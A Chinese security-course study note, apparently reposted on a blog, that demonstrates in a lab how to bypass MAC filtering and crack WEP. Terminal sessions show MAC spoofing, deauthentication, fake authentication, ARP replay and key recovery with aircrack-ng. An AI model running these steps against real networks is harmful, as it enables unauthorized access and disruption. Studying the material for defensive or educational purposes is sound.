【安全牛学习笔记】Mac地址绑定攻击
来源:互联网 发布:ct重建算法 编辑:程序博客网 时间:2024/05/30 20:08
管理员误以为MAC绑定是一种安全机制
限制可以关联的客户端MAC地址
准备AP
AP基本配置
Open认证
开启无线过滤
修改MAC地址绕过过滤
root@kali:~# ifconfig
eth0 Link encap:Ethernet HWaddr 08:00:27:fd:1c:9d
inet addr:192.168.20.8 Bcast:192.168.20.255 Mask:255.255.255.0
inet6 addr: fe80::a00:27ff:fefd:1c9d/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 MetricL:1
Rx packets:0 errors:0 dropped:0 overruns:0 frame:0
Tx packets:50 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
Rx bytes:1200 (0.0 KiB) TX bytes:1200 (0.0 KiB)
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet addr. ::1/128 Scope:Host
UP LOOKBACK RUNNING MTU:65536 MetricL:1
Rx packets:20 errors:0 dropped:0 overruns:0 frame:0
Tx packets:20 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
Rx bytes:1200 (1.1 KiB) TX bytes:1200 (1.1 KiB)
wlan2 Link encap:Ethernet HWaddr 08:57:00:0c:96:68
UP BROADCAST MULTICAST MTU:1500 Metric:1
Rx packets:20 errors:0 dropped:0 overruns:0 frame:0
Tx packets:20 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
Rx bytes:0 (0.0 B) TX bytes:0 (0.0 B)
root@kali:~# service network-manager stop
root@kali:~# airmon-ng check kill
Killing these processes:
PID Name
718 dnclinet
931 wpa_supplicant
root@kali:~# airmon-ng start wlan2
No interfering processes found
PHY Interface Driver Chipest
phy0 wlan2 ath9k_htc Atheros Communications, Inc, AR9271 802.11n
(mac80211 monitor mode vif enable for [phy0]wlan2 on [phy0]wlan2mon)
(mac80211 station mode vif disabled for [phy0]wlan2)
root@kali:~# iwconfig
eth0 no wireless extensions
wlan2mon IEEE 802.11bgn Mode:Monitor Frequency:2.57 GHz Tx-Power=20 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:off
lo no wireless extensions
root@kali:~# iwlist wlan2mon channel
wlan2 13 channels in total; avaiable frequencies :
Channel 01 : 2.412 GHz
Channel 02 : 2.417 GHz
Channel 03 : 2.422 GHz
Channel 04 : 2.427 GHz
Channel 05 : 2.432 GHz
Channel 06 : 2.437 GHz
Channel 07 : 2.442 GHz
Channel 08 : 2.447 GHz
Channel 09 : 2.452 GHz
Channel 10 : 2.457 GHz
Channel 11 : 2.462 GHz
Channel 12 : 2.467 GHz
Channel 13 : 2.472 GHz
Current Frequency:2.457 GHz (Channel 10)
root@kali:~# iw dev wlan2mon set channel 11 //启用11信道
root@kali:~# iwlist wlan2mon channel
wlan2 13 channels in total; avaiable frequencies :
Channel 01 : 2.412 GHz
Channel 02 : 2.417 GHz
Channel 03 : 2.422 GHz
Channel 04 : 2.427 GHz
Channel 05 : 2.432 GHz
Channel 06 : 2.437 GHz
Channel 07 : 2.442 GHz
Channel 08 : 2.447 GHz
Channel 09 : 2.452 GHz
Channel 10 : 2.457 GHz
Channel 11 : 2.462 GHz
Channel 12 : 2.467 GHz
Channel 13 : 2.472 GHz
Current Frequency:2.462 GHz (Channel 11)
root@kali:~# airmon-ng wlan2mon //侦听附近所有的AP和客户
root@kali:~# airmon-ug stop wlan2mon
root@kali:~# airmon-ng start wlan2 11 //直接启用11信道进行监听
root@kali:~# iwlist wlan2mon channel
wlan2 13 channels in total; avaiable frequencies :
Channel 01 : 2.412 GHz
Channel 02 : 2.417 GHz
Channel 03 : 2.422 GHz
Channel 04 : 2.427 GHz
Channel 05 : 2.432 GHz
Channel 06 : 2.437 GHz
Channel 07 : 2.442 GHz
Channel 08 : 2.447 GHz
Channel 09 : 2.452 GHz
Channel 10 : 2.457 GHz
Channel 11 : 2.462 GHz
Channel 12 : 2.467 GHz
Channel 13 : 2.472 GHz
Current Frequency:2.462 GHz (Channel 11)
root@kali:~# airodump-ng wlan2mon //侦听附近所有的AP和客户
------------------------------------------------------------
root@kali:~# ifconfig
eth0 Link encap:Ethernet HWaddr 08:00:27:fd:1c:9d
inet addr:192.168.20.8 Bcast:192.168.20.255 Mask:255.255.255.0
inet6 addr: fe80::a00:27ff:fefd:1c9d/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 MetricL:1
Rx packets:0 errors:0 dropped:0 overruns:0 frame:0
Tx packets:50 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
Rx bytes:1200 (0.0 KiB) TX bytes:1200 (0.0 KiB)
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet addr. ::1/128 Scope:Host
UP LOOKBACK RUNNING MTU:65536 MetricL:1
Rx packets:20 errors:0 dropped:0 overruns:0 frame:0
Tx packets:20 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
Rx bytes:1200 (1.1 KiB) TX bytes:1200 (1.1 KiB)
wlan2 Link encap:Ethernet HWaddr 08:57:00:0c:96:68
UP BROADCAST MULTICAST MTU:1500 Metric:1
Rx packets:20 errors:0 dropped:0 overruns:0 frame:0
Tx packets:20 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
Rx bytes:0 (0.0 B) TX bytes:0 (0.0 B)
root@kali:~# airmon-ng start wlan2 11 //直接启用11信道进行监听
Found 2 processes that could cause trouble.
If airodump, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
PID Name
1944 avahi-deamon
1945 avahi-deamon
PHY Interface Driver Chipest
phy0 wlan2 ath9k_htc Atheros Communications, Inc, AR9271 802.11n
(mac80211 monitor mode vif enable for [phy0]wlan2 on [phy0]wlan2mon)
(mac80211 station mode vif disabled for [phy0]wlan2)
root@kali:~# iwconfig
eth0 no wireless extensions
wlan2mon IEEE 802.11bgn Mode:Monitor Frequency:2.57 GHz Tx-Power=20 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:off
lo no wireless extensions
root@kali:~# iwlist wlan2mon channel
wlan2 13 channels in total; avaiable frequencies :
Channel 01 : 2.412 GHz
Channel 02 : 2.417 GHz
Channel 03 : 2.422 GHz
Channel 04 : 2.427 GHz
Channel 05 : 2.432 GHz
Channel 06 : 2.437 GHz
Channel 07 : 2.442 GHz
Channel 08 : 2.447 GHz
Channel 09 : 2.452 GHz
Channel 10 : 2.457 GHz
Channel 11 : 2.462 GHz
Channel 12 : 2.467 GHz
Channel 13 : 2.472 GHz
Current Frequency:2.462 GHz (Channel 11)
root@kali:~# airodump-ng wlan2mon -c 11 //侦听信道11附近所有的AP和客户
root@kali:~# airodump-ng wlan2mon -c 11 --bssid EC:26:CA:DC:29:B6
root@kali:~# ifconfig wlan0 down
root@kali:~# macchanger -m 68:3E:34:30:0F:AA wlan0
Current MAC: c8:3a:35:ca:46:91 (Tenda Technology Co., Ltd.)
Permanent MAC: c8:3a:35:ca:46:91 (Tenda Technology Co., Ltd.)
New MAC: 68:3e:34:30:0f:aa (unknown)
root@kali:~# ifconfig wlan0 up
root@kali:~# ifconfig
root@kali:~# airodump-ng wlan2mon -c 11 --bssid 68:3e:34:30:0f:aa
WEP攻击WEP共享密钥破解WEP密码破解原理
IV并非完全随机
每224个包可能出现一次IV重用
收集大量IV之后找到相同IV及其对应密码文,分析得出共享密码
ARP回包中包含IV
IV足够多的情况下,任何复杂程度的wep密码都可以被破解
root@kali:~# airodump-ng wlan2mon
root@kali:~# airodump-ng -c 11 --bssid EC:26:CA:DC:29:B6 -w wep wlan2mon
WEP共享密钥破解启动monitor模式
启动抓包并保存抓包
Deauthentication抓包XOR文件
利用XOR文件与AP建立关联
执行ARP重放
Deauthenticiation触发ARP数据包
收集足够DATA之后破解密码
root@kali:~# ls
wep-01.csv wep-01.kismet.csv wep-01-EC-26-CA-DC-29-86.xor wep-01.kisment.netxml
root@kali:~# cat wep-01-EC-26-CA-DC-29-86.xor //查看的是一个密文
root@kali:~# aireplay-ng --help
Aireplay-ng 1.2 rc2 - (C) 2006-2014 Thomas d'Otreppe
http://www.aircrack-ng.org
usage: aireplay-ng <options> <replay interface>
Filter options:
-b bssid : MAC address, Access Point
-d dmac : MAC address, Destination
-s smac : MAC address, Source
-m len : minimum packet length
-n len : maximum packet length
-u type : frame control, type field
-v subt : frame control, subtype field
-t tods : frame control, To DS bit
-f fromds : frame control, From DS bit
-w iswep : frame control, WEP bit
-D : disable AP detection
Replay options:
-x nbpps : number of packets per second
-p fctrl : set frame control word (hex)
-a bssid : set Access Point MAC address
-c dmac : set Destination MAC address
-h smac : set Source MAC address
-g value : change ring buffer size (default: 8)
-F : choose first matching packet
Fakeauth attack options:
-e essid : set target AP SSID
-o npckts : number of packets per burst (0=auto, default: 1)
-q sec : seconds between keep-alives
-Q : send reassociation requests
-y prga : keystream for shared key auth
-T n : exit after retry fake auth request n time
Arp Replay attack options:
-j : inject FromDS packets
Fragmentation attack options:
-k IP : set destination IP in fragments
-l IP : set source IP in fragments
Test attack options:
-B : activates the bitrate test
Source options:
-i iface : capture packets from this interface
-r file : extract packets from this pcap file
Miscellaneous options:
-R : disable /dev/rtc usage
--ignore-negative-one : if the interface's channel can't be determined,
ignore the mismatch, needed for unpatched cfg80211
Attack modes (numbers can still be used):
--deauth count : deauthenticate 1 or all stations (-0)
--fakeauth delay : fake authentication with AP (-1)
--interactive : interactive frame selection (-2)
--arpreplay : standard ARP-request replay (-3)
--chopchop : decrypt/chopchop WEP packet (-4)
--fragment : generates valid keystream (-5)
--caffe-latte : query a client for new IVs (-6)
--cfrag : fragments against a client (-7)
--migmode : attacks WPA migration mode (-8)
--test : tests injection and quality (-9)
--help : Displays this usage screen
root@kali:~# aireplay-ng -1 60 -e kifi -y wep-01-EC-26-CA-DC-29-86.xor -a EC:26:CA:DC:29:B6 -h 08-57-00-0C-96-68 wlan2mon
//第一种注入方式,每60秒发一次authentication进行身份认证,关联目标wifibSSID,密钥流,AP,本机网卡的manage地址
21:44:21 Waiting for beacon frame (BSSID: EC:26:CA:DC:29:B6) on channel
21:44:21 Sending Authentication Request (Shared Key) [ACK]
21:44:21 Authentication 1/2 successful
21:44:21 Sending encrypted challege. [ACK]
21:44:21 Authentication 2/2 successful
21:44:21 Sending Association Request [ACK]
21:44:21 Association successful :-) (AID: 1)
21:44:36 Sending keep-alive packet [ACK]
21:44:51 Sending keep-alive packet [ACK]
21:45:06 Sending Authentication Request (Shared Key) [ACK]
21:45:21 Authentication 1/2 successful
21:45:21 Sending encrypted challege. [ACK]
21:45:21 Authentication 2/2 successful
21:45:21 Sending Association Request [ACK]
21:45:21 Association successful :-) (AID: 1)
21:45:36 Sending keep-alive packet [ACK]
21:45:51 Sending keep-alive packet [ACK]
21:46:06 Sending keep-alive packet [ACK]
21:45:06 Sending Authentication Request (Shared Key) [ACK]
21:47:21 Authentication 1/2 successful
21:47:21 Sending encrypted challege. [ACK]
21:47:21 Authentication 2/2 successful
21:47:21 Sending Association Request [ACK]
21:47:21 Association successful :-) (AID: 1)
21:47:36 Sending keep-alive packet [ACK]
root@kali:~# aireplay-ng -0 1 -a EC:26:CA:DC:29:B6 -C 68:3E:34:30:0F:AA wlan2mon //解除关联关系
21:54:29 Waiting for beacon frame (BSSID: EC:26:CA:DC:29:B6) on channel 11
21:54:29 Sending 64 directed DeAuth. STMAC: [68:3E:34:30:0F:AA] [ 2|64 ACKs]
root@kali:~# aireplay-ng -0 10 -a EC:26:CA:DC:29:B6 -C 68:3E:34:30:0F:AA wlan2mon
root@kali:~# aireplay-ng -3 -b EC:26:CA:DC:29:B6 -h 08:57:00:0C:96:68 wlan2mon
21:42:17 Waiting for beacon frame (BSSID: Ec:26:CA:DC:29:B6) on channel 11
Saving ARP requests in replay_arp-1105-214217.cap
you shoule also start airodump-ng to capture relies.
Read 20814 packets (got 0 ARP request and 0 ACKs),sent 0 packets...(0 pps)
root@kali:~# aireplay-ng -0 2 -a EC:26:CA:DC:29:B6 -c 68:3E:34:30:0F:AA wlanmon //把客户端打掉然后重连
root@kali:~# ls
wep-01.csv wep-01.kismet.csv wep-01-EC-26-CA-DC-29-86.xor wep-01.kisment.netxml replay_arp-1105-214217.cap wep-01.cap
root@kali:~# wireshark wep-01.cap
root@kali:~# aircrack-ng wep-01.cap
Aircrack-ng 1.2 rc2
KB depth bytes(vote)
0 0/ 2 31(247040) 80(195072) EO(193280) 51(193024) 0A(192000) 4B(190464) 85(190464) BE(190208) 78(189696) EF(189696) 2C(189184)
1 1/ 2 77(198912) A1(195584) 2F(195816) 95(193024) E6(192512) B5(190976) 1F(189696) 60(189184) AE(188672) 7A(188416) BB(188426)
2 8/ 2 9B(189184) 3A(188672) D7(188672) EC(188672) 6C(188416) 25(187648) FE(187648) 9A(186880) E4(186880) BB(186624) 27(185856)
3 0/ 4 A2(240896) 4E(190464) A5(189952) FB(189184) DB(188928) 18(188672) 12(188160) 28(187648) 42(187136) F1(186880) 0E(186624)
4 91/ 4 E7(178944) 74(178688) AC(178688) 5F(178432) 65(178432) 90(178432) C6(178176) 3E(177920) 42(177920) B7(177920) BA(177920)
KEY FOUND! [ 31:32:33:34:35:36:37:38:39:30:31:32:33 ] (ASCII: 1234567890123 )
Decrypted correctly: 100%
WEP破解全部需要首先伪造认证,以便于AP进行正常通信
不产生ARP数据包
aireplay-ng -1 0 -e kifi -a <AP MAC> -h <Your MAC> <interface>
aireplay-ng -1 60 -0 1 -q 10 -e <ESSID> -a <AP MAC> -h <Your MAC><interface>
每60000秒发送reauthenticiation
-o 1 每次身份认证只发一组认证数据
-q 10 每10秒发keep-live帧 FAKE AUTHENTICATION
某些AP验证客户端MAC地址OUI (前三个字节)
MAC地址过滤
Denied (Code 1) is WPA in use
WPA/WPA2不支持Fake authentication
使用真实MAC地址
物理靠近AP
侦听信道正确FAKE AUTHENTICATION排错
物理足够接近被攻击者
与被攻击者使用相同无线标准b、n、g
客户端可能拒绝广播帧,建议制定客户端
ARP重放
侦听正常的ARP包并重放给AP
AP回包中包含大量弱IV
aireplay-ng -3 -b <AP MAC> -h <Source MAC><interface name>
-h合法客户端/供给者MAC
Airodump-ng data字段
64bit密钥: 25万
128bit密钥: 150万
Airecrack-ng wep.cap
该笔记为安全牛课堂学员笔记,想看此课程或者信息安全类干货可以移步到安全牛课堂
Security+认证为什么是互联网+时代最火爆的认证?
牛妹先给大家介绍一下Security+
Security+ 认证是一种中立第三方认证,其发证机构为美国计算机行业协会CompTIA ;是和CISSP、ITIL 等共同包含在内的国际 IT 业 10 大热门认证之一,和CISSP偏重信息安全管理相比,Security+ 认证更偏重信息安全技术和操作。
通过该认证证明了您具备网络安全,合规性和操作安全,威胁和漏洞,应用程序、数据和主机安全,访问控制和身份管理以及加密技术等方面的能力。因其考试难度不易,含金量较高,目前已被全球企业和安全专业人士所普遍采纳。
Security+认证如此火爆的原因?
原因一:在所有信息安全认证当中,偏重信息安全技术的认证是空白的, Security+认证正好可以弥补信息安全技术领域的空白 。
目前行业内受认可的信息安全认证主要有CISP和CISSP,但是无论CISP还是CISSP都是偏重信息安全管理的,技术知识讲的宽泛且浅显,考试都是一带而过。而且CISSP要求持证人员的信息安全工作经验都要5年以上,CISP也要求大专学历4年以上工作经验,这些要求无疑把有能力且上进的年轻人的持证之路堵住。在现实社会中,无论是找工作还是升职加薪,或是投标时候报人员,认证都是必不可少的,这给年轻人带来了很多不公平。而Security+的出现可以扫清这些年轻人职业发展中的障碍,由于Security+偏重信息安全技术,所以对工作经验没有特别的要求。只要你有IT相关背景,追求进步就可以学习和考试。
原因二: IT运维人员工作与翻身的利器。
在银行、证券、保险、信息通讯等行业,IT运维人员非常多,IT运维涉及的工作面也非常广。是一个集网络、系统、安全、应用架构、存储为一体的综合性技术岗。虽然没有程序猿们“生当做光棍,死亦写代码”的悲壮,但也有着“锄禾日当午,不如运维苦“的感慨。天天对着电脑和机器,时间长了难免有对于职业发展的迷茫和困惑。Security+国际认证的出现可以让有追求的IT运维人员学习网络安全知识,掌握网络安全实践。职业发展朝着网络安全的方向发展,解决国内信息安全人才的匮乏问题。另外,即使不转型,要做好运维工作,学习安全知识取得安全认证也是必不可少的。
原因三:接地气、国际范儿、考试方便、费用适中!
CompTIA作为全球ICT领域最具影响力的全球领先机构,在信息安全人才认证方面是专业、公平、公正的。Security+认证偏重操作且和一线工程师的日常工作息息相关。适合银行、证券、保险、互联网公司等IT相关人员学习。作为国际认证在全球147个国家受到广泛的认可。
在目前的信息安全大潮之下,人才是信息安全发展的关键。而目前国内的信息安全人才是非常匮乏的,相信Security+认证一定会成为最火爆的信息安全认证。
- 【安全牛学习笔记】Mac地址绑定攻击
- 绑定网关mac地址防止arp攻击
- 绑定MAC地址-防止ARP攻击
- 【安全牛学习笔记】WPA攻击
- 【安全牛学习笔记】 HTTPS攻击
- 【安全牛学习笔记】Smurf攻击、Sockstress
- 【安全牛学习笔记】DNS放大攻击
- 【安全牛学习笔记】SNMP放大攻击
- 【安全牛学习笔记】NTP放大攻击
- 【安全牛学习笔记】拒绝服务攻击工具
- 【安全牛学习笔记】HTTPS攻击
- 交换机MAC地址与端口的绑定------学习笔记
- ARP攻击网络上不去,可以进行mac地址绑定
- ARP攻击 绑定MAC
- 【安全牛学习笔记】SSL、TLS中间人攻击
- 【安全牛学习笔记】密码嗅探、中间人攻击
- 【安全牛学习笔记】SSL、TLS中间人攻击
- web安全学习笔记之-注入攻击
- **map**集合的嵌套
- 快来认识一下我的家乡方言吧!
- IO流
- 带头结点的单链表就地逆置
- 测试 —— 与开发双手互搏的艺术
- 【安全牛学习笔记】Mac地址绑定攻击
- jmu-ds-单链表的基本运算
- 字节流
- cesiumjs通过经纬控制显示范围
- 多线程
- 网络编程
- HDU
- 反射
- 51nod 1049 最大子段和
